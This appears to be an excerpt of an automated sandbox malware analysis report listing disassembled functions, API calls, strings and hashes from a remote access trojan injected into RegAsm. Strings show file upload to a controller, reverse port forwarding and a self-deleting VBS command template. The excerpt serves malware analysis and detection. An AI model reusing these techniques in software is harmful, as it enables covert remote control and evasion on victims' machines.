                                • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C0F9
                                • lstrcmpW.KERNEL32(?,?), ref: 0041C114
                                • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C12C
                                • _wcslen.LIBCMT ref: 0041C13B
                                • FindVolumeClose.KERNEL32 ref: 0041C15B
                                • GetLastError.KERNEL32 ref: 0041C173
                                • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C1A0
                                • lstrcatW.KERNEL32 ref: 0041C1B9
                                • lstrcpyW.KERNEL32(?,?), ref: 0041C1C8
                                • GetLastError.KERNEL32 ref: 0041C1D0
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                • String ID: ?
                                • API String ID: 3941738427-1684325040
                                • Opcode ID: 8bb61c95002590c369f4a1d7d05134d86b2ad7932cc4dc2ebb1cdf4d201e776a
                                • Instruction ID: a349862c8cee18361e8dc915c9858c0b302c9409c899df8dda18ff866c7f94c5
                                • Opcode Fuzzy Hash: 8bb61c95002590c369f4a1d7d05134d86b2ad7932cc4dc2ebb1cdf4d201e776a
                                • Instruction Fuzzy Hash: 8B416171584316EBD720DFA0DC889EB77ECAB49755F00092BF545C2261EB78C988CBDA
                                Function 00412AB4 Relevance: 25.0, APIs: 9, Strings: 5, Instructions: 482sleepfileCOMMON
                                Download Yara Rule
                                APIs
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412ACD
                                  • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,63771986,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F
                                  • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5), ref: 0041857E
                                  • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F), ref: 00418587
                                • Sleep.KERNEL32(0000000A,00465E74), ref: 00412C1F
                                • Sleep.KERNEL32(0000000A,00465E74,00465E74), ref: 00412CC1
                                • Sleep.KERNEL32(0000000A,00465E74,00465E74,00465E74), ref: 00412D63
                                • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DC5
                                • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DFC
                                • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412E38
                                • Sleep.KERNEL32(000001F4,00465E74,00465E74,00465E74), ref: 00412E52
                                • Sleep.KERNEL32(00000064), ref: 00412E94
                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                • String ID: /stext "$0TG$0TG$NG$NG
                                • API String ID: 1223786279-2576077980
                                • Opcode ID: de99695a2377092233645f0904676b2253a7a5c985bfcff82bcc484c3e6878f2
                                • Instruction ID: 3b0169c2c8bc9f0d695cedb60fdc7b81a1931596247e975dd6f1dc47d42db627
                                • Opcode Fuzzy Hash: de99695a2377092233645f0904676b2253a7a5c985bfcff82bcc484c3e6878f2
                                • Instruction Fuzzy Hash: 990255311083418AC325FB62D851AEFB3E5AFD4348F50483EF58A971E2EF785A49C65A
                                Function 0044F42D Relevance: 24.4, APIs: 16, Instructions: 419COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$EnvironmentVariable
                                • String ID:
                                • API String ID: 1464849758-0
                                • Opcode ID: 12b2d8700cfafab1c51f31b0af1c60b5a90c67e430b3d12670f3d9796c815c4a
                                • Instruction ID: f75d98bba309171a1893162bbba9979c566f834f65d54a181aa040c21db392b6
                                • Opcode Fuzzy Hash: 12b2d8700cfafab1c51f31b0af1c60b5a90c67e430b3d12670f3d9796c815c4a
                                • Instruction Fuzzy Hash: C4D13672D007006BFB20AF799D81A6B77A4EF01318F05427FE919A7382EB3D99058799
                                Function 0041C68F Relevance: 23.0, APIs: 6, Strings: 7, Instructions: 214registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C6B1
                                • RegEnumKeyExA.ADVAPI32 ref: 0041C6F5
                                • RegCloseKey.ADVAPI32(?), ref: 0041C9BF
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseEnumOpen
                                • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                • API String ID: 1332880857-3714951968
                                • Opcode ID: 01bc9fe353fd2bad3d2e5d6b02442aa3bdaad2c57b214901d2918a8b4713c134
                                • Instruction ID: af0903b0dab8fbea49832074ad132f154b97281cd99b968e1e8b6bf9777b958e
                                • Opcode Fuzzy Hash: 01bc9fe353fd2bad3d2e5d6b02442aa3bdaad2c57b214901d2918a8b4713c134
                                • Instruction Fuzzy Hash: 248144711083419BC325EF11D851EEFB7E8BF94309F10492FB589921A1FF78AE49CA5A
                                Function 0041D58F Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 74windowCOMMON
                                Download Yara Rule
                                APIs
                                • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D5DA
                                • GetCursorPos.USER32(?), ref: 0041D5E9
                                • SetForegroundWindow.USER32(?), ref: 0041D5F2
                                • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D60C
                                • Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D65D
                                • ExitProcess.KERNEL32 ref: 0041D665
                                • CreatePopupMenu.USER32 ref: 0041D66B
                                • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D680
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                • String ID: Close
                                • API String ID: 1657328048-3535843008
                                • Opcode ID: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
                                • Instruction ID: 483e3be36cf21f9f431d69439bfbb75804d706e25d1e382f075e68ac53faeb55
                                • Opcode Fuzzy Hash: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
                                • Instruction Fuzzy Hash: 392127B1944208FFDB194FA4ED0EAAA3B65FB08342F000135FA0A950B1D775EDA1EB5D
                                Function 00445D56 Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$Info
                                • String ID:
                                • API String ID: 2509303402-0
                                • Opcode ID: c43f3e9ef6aa90fc617fbeb0adb34ec0a6d023508037e2c59db227b807854484
                                • Instruction ID: 88ee944febda996c7adaaf7605242af7944d99fb061a5fd2e4f26fad8993db39
                                • Opcode Fuzzy Hash: c43f3e9ef6aa90fc617fbeb0adb34ec0a6d023508037e2c59db227b807854484
                                • Instruction Fuzzy Hash: 75B1CD719006059FEF20DF69C881BEEBBB4FF09304F14412EF5A8A7242D6799D45CB65
                                Function 00408B7A Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 328fileCOMMON
                                Download Yara Rule
                                APIs
                                • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00408CE3
                                • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D1B
                                • __aulldiv.LIBCMT ref: 00408D4D
                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                  • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408E70
                                • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408E8B
                                • CloseHandle.KERNEL32(00000000), ref: 00408F64
                                • CloseHandle.KERNEL32(00000000), ref: 00408FAE
                                • CloseHandle.KERNEL32(00000000), ref: 00408FFC
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
                                • API String ID: 3086580692-2582957567
                                • Opcode ID: 72fad283c4fe1643dee5b4a459ce18e644925f4e3f1a855a4ff9453ab0215ac4
                                • Instruction ID: 4fd1ef8f0950b8c70c5ee12d710945c0a569e6ad21e20d2a74dcf75f3ec9a52d
                                • Opcode Fuzzy Hash: 72fad283c4fe1643dee5b4a459ce18e644925f4e3f1a855a4ff9453ab0215ac4
                                • Instruction Fuzzy Hash: 95B193716083409BC314FB25C982AAFB7E5AFC4354F50492FF589622D2EF789945CB8B
                                Function 004512C6 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • ___free_lconv_mon.LIBCMT ref: 0045130A
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 0045051F
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 00450531
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 00450543
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 00450555
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 00450567
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 00450579
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 0045058B
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 0045059D
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 004505AF
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 004505C1
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 004505D3
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 004505E5
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 004505F7
                                • _free.LIBCMT ref: 004512FF
                                  • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
                                  • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                • _free.LIBCMT ref: 00451321
                                • _free.LIBCMT ref: 00451336
                                • _free.LIBCMT ref: 00451341
                                • _free.LIBCMT ref: 00451363
                                • _free.LIBCMT ref: 00451376
                                • _free.LIBCMT ref: 00451384
                                • _free.LIBCMT ref: 0045138F
                                • _free.LIBCMT ref: 004513C7
                                • _free.LIBCMT ref: 004513CE
                                • _free.LIBCMT ref: 004513EB
                                • _free.LIBCMT ref: 00451403
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                • String ID:
                                • API String ID: 161543041-0
                                • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                • Instruction ID: 673b37a441ff9bbb7eb6cd98574e5fa8379d72fae64c09c4febd1ea684bb8cd8
                                • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                • Instruction Fuzzy Hash: 0E319E315007009FFB20AA7AD845B5B73E8EF0131AF50851FEC68D7662DF78AD448B59
                                Function 00419FB4 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 176sleeptimeCOMMON
                                Download Yara Rule
                                APIs
                                • __EH_prolog.LIBCMT ref: 00419FB9
                                • GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 00419FEB
                                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A077
                                • Sleep.KERNEL32(000003E8), ref: 0041A0FD
                                • GetLocalTime.KERNEL32(?), ref: 0041A105
                                • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A1F4
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i$PG$PG$PG
                                • API String ID: 489098229-1431523004
                                • Opcode ID: c46b288c88e8fad2cac684537be2f5c8f54ab494b41e10cc9a988c1d5ba90d08
                                • Instruction ID: 65e100c03f0dda0ba9a952c873ad8774fe275ee1deca45487f64c7c8a8292b0e
                                • Opcode Fuzzy Hash: c46b288c88e8fad2cac684537be2f5c8f54ab494b41e10cc9a988c1d5ba90d08
                                • Instruction Fuzzy Hash: E7515D70A00215AACB14BBB5C8529ED7BA9AB44308F40403FF509AB1E2EF7C9D85C799
                                Function 0040D7FF Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 148COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                                  • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                                  • Part of subcall function 004136F8: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 00413714
                                  • Part of subcall function 004136F8: RegQueryValueExA.KERNEL32 ref: 0041372D
                                  • Part of subcall function 004136F8: RegCloseKey.KERNEL32(00000000), ref: 00413738
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D859
                                • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D9B8
                                • ExitProcess.KERNEL32 ref: 0040D9C4
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                • String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                • API String ID: 1913171305-3159800282
                                • Opcode ID: 636c7451f86ad7dcbf51a7e77965c9df5bd33ebd3fbbde82d92fca028294b8c2
                                • Instruction ID: 6fc8d312854778a25908ca85050b1cee1951ef16e4956e50e312a563d71e527c
                                • Opcode Fuzzy Hash: 636c7451f86ad7dcbf51a7e77965c9df5bd33ebd3fbbde82d92fca028294b8c2
                                • Instruction Fuzzy Hash: 0C413A719001195ACB15FA62DC56DEEB778AF50309F10007FB10AB61E2EF785E4ACA98
                                Function 00450600 Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free
                                • String ID:
                                • API String ID: 269201875-0
                                • Opcode ID: 47079874d6611f76b22abc1c1892e8562d414d23f3395fd45a7677fdf32a9ec5
                                • Instruction ID: d910990a8472ee08c0279d8077499983e41ff25138a9859a729e4309013b5263
                                • Opcode Fuzzy Hash: 47079874d6611f76b22abc1c1892e8562d414d23f3395fd45a7677fdf32a9ec5
                                • Instruction Fuzzy Hash: E2C17476D40204AFEB20DBA9CC83FDE77B8AB19705F14015AFE05EB283D6B49D458798
                                Function 00404E26 Relevance: 18.1, APIs: 12, Instructions: 65synchronizationCOMMON
                                Download Yara Rule
                                APIs
                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                • CloseHandle.KERNEL32(?), ref: 00404E4C
                                • closesocket.WS2_32(000000FF), ref: 00404E5A
                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E91
                                • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404EA2
                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404EA9
                                • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBA
                                • CloseHandle.KERNEL32(?), ref: 00404EBF
                                • CloseHandle.KERNEL32(?), ref: 00404EC4
                                • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED1
                                • CloseHandle.KERNEL32(?), ref: 00404ED6
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                • String ID:
                                • API String ID: 3658366068-0
                                • Opcode ID: 0463b1faaa3f7a02a97a49212c31dd980e99cbb732c39645afe60185321c9919
                                • Instruction ID: 0c11cd9b042c69dc9d4dd2828563f6d61870a883144e53252efabab5b24bcc37
                                • Opcode Fuzzy Hash: 0463b1faaa3f7a02a97a49212c31dd980e99cbb732c39645afe60185321c9919
                                • Instruction Fuzzy Hash: BF21E871104B04AFDB216B26DC49B27BBA1FF40326F104A2EE2E211AF1CB75B851DB58
                                Function 00455BDB Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 004558A9: CreateFileW.KERNEL32(00000000,00000000,?,00455C84,?,?,00000000), ref: 004558C6
                                • GetLastError.KERNEL32 ref: 00455CEF
                                • __dosmaperr.LIBCMT ref: 00455CF6
                                • GetFileType.KERNEL32 ref: 00455D02
                                • GetLastError.KERNEL32 ref: 00455D0C
                                • __dosmaperr.LIBCMT ref: 00455D15
                                • CloseHandle.KERNEL32(00000000), ref: 00455D35
                                • CloseHandle.KERNEL32(?), ref: 00455E7F
                                • GetLastError.KERNEL32 ref: 00455EB1
                                • __dosmaperr.LIBCMT ref: 00455EB8
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                • String ID: H
                                • API String ID: 4237864984-2852464175
                                • Opcode ID: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
                                • Instruction ID: f4290dc4267d91ba683862cdaabef3013db21248f4240db41616def06e578eae
                                • Opcode Fuzzy Hash: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
                                • Instruction Fuzzy Hash: D5A155329106049FDF19AF68DC617BE3BA0EB06325F14415EEC11EB392CB398D5ACB59
                                Function 00453D83 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 268COMMON
                                Download Yara Rule
                                APIs
                                • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,0045405C,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453E2F
                                • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453EB2
                                • __alloca_probe_16.LIBCMT ref: 00453EEA
                                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,00000001,00000000,\@E,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F45
                                • __alloca_probe_16.LIBCMT ref: 00453F94
                                • MultiByteToWideChar.KERNEL32(00000001,00000009,00000001,00000000,00000000,00000000,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F5C
                                  • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                • MultiByteToWideChar.KERNEL32(00000001,00000001,00000001,00000000,00000000,?,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FD8
                                • __freea.LIBCMT ref: 00454003
                                • __freea.LIBCMT ref: 0045400F
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                • String ID: \@E
                                • API String ID: 201697637-1814623452
                                • Opcode ID: b82298bc980002c4571abe1a7b6d85811e1f97afd47d25fecd247c7af7e2facf
                                • Instruction ID: bd5a1837779a5f2dcb5c2ea5aeb828518df7829aba760434011a70bbc407b236
                                • Opcode Fuzzy Hash: b82298bc980002c4571abe1a7b6d85811e1f97afd47d25fecd247c7af7e2facf
                                • Instruction Fuzzy Hash: E391F472E002069ADB209E65CC42AEFBBF59F09756F14052BFC01E7282D739DD89C768
                                Function 00450A25 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 204COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free
                                • String ID: \&G$\&G$`&G
                                • API String ID: 269201875-253610517
                                • Opcode ID: 97c3add27e511c4221db80506819b16e682529302af84ee57927f6cd57728be0
                                • Instruction ID: 0b3297c67b001fbc5a9f4fbe1fd197d652097ca420ae28a40b4f72db8b3ed5d1
                                • Opcode Fuzzy Hash: 97c3add27e511c4221db80506819b16e682529302af84ee57927f6cd57728be0
                                • Instruction Fuzzy Hash: 77610475900204AFDB20CFA9C882B9ABBF4EF05315F14416BED58EB342D774AD458B98
                                Function 00414BB0 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 158COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 65535$udp
                                • API String ID: 0-1267037602
                                • Opcode ID: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
                                • Instruction ID: ff24d6befd6f0703c902a6165bd45161ed4db0fb5f75d2635e7e580b9b2721aa
                                • Opcode Fuzzy Hash: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
                                • Instruction Fuzzy Hash: EF51E7756093019FDB209B58E9057BB37A4AFC4755F08082FF881973A1E76DCCC1865E
                                Function 0043A83A Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A892
                                • GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A89F
                                • __dosmaperr.LIBCMT ref: 0043A8A6
                                • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8D2
                                • GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8DC
                                • __dosmaperr.LIBCMT ref: 0043A8E3
                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A926
                                • GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A930
                                • __dosmaperr.LIBCMT ref: 0043A937
                                • _free.LIBCMT ref: 0043A943
                                • _free.LIBCMT ref: 0043A94A
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                • String ID:
                                • API String ID: 2441525078-0
                                • Opcode ID: ad6d2cb2e677ca1b0a2e36bb2f761ff70c692d274a08f618d4296a8b89361871
                                • Instruction ID: 785efe6d9c8e3fffb8b85045f967b8474775cb8629fdf0d32462ae01257f7f2e
                                • Opcode Fuzzy Hash: ad6d2cb2e677ca1b0a2e36bb2f761ff70c692d274a08f618d4296a8b89361871
                                • Instruction Fuzzy Hash: FF31F57140420AFFDF01AFA5CC45DAF3B68EF09325F10021AF950662A1DB38CD21DB6A
                                Function 004114F5 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 191COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Eventinet_ntoa
                                • String ID: (I)$GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
                                • API String ID: 3578746661-1198914978
                                • Opcode ID: 3f082225e019e5f23cda82c97963733030d7f4d81a9d09057851c62978149c78
                                • Instruction ID: 71dfdc03858149a45142756d2b421c0b7bbb6d70992310a40494c7f1f0681c69
                                • Opcode Fuzzy Hash: 3f082225e019e5f23cda82c97963733030d7f4d81a9d09057851c62978149c78
                                • Instruction Fuzzy Hash: 0051C131A042015BC614FB36C91AAAE37A5AB85344F40453FF906A76F1EF7C8985C7DE
                                Function 004054A0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON
                                Download Yara Rule
                                APIs
                                • SetEvent.KERNEL32(?,?), ref: 004054BF
                                • GetMessageA.USER32 ref: 0040556F
                                • TranslateMessage.USER32(?), ref: 0040557E
                                • DispatchMessageA.USER32 ref: 00405589
                                • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
                                • HeapFree.KERNEL32(00000000,00000000,0000003B), ref: 00405679
                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                • String ID: CloseChat$DisplayMessage$GetMessage
                                • API String ID: 2956720200-749203953
                                • Opcode ID: 1596478972ce96747ca32779f183717890ad831c566256f19ff3d4655c30f502
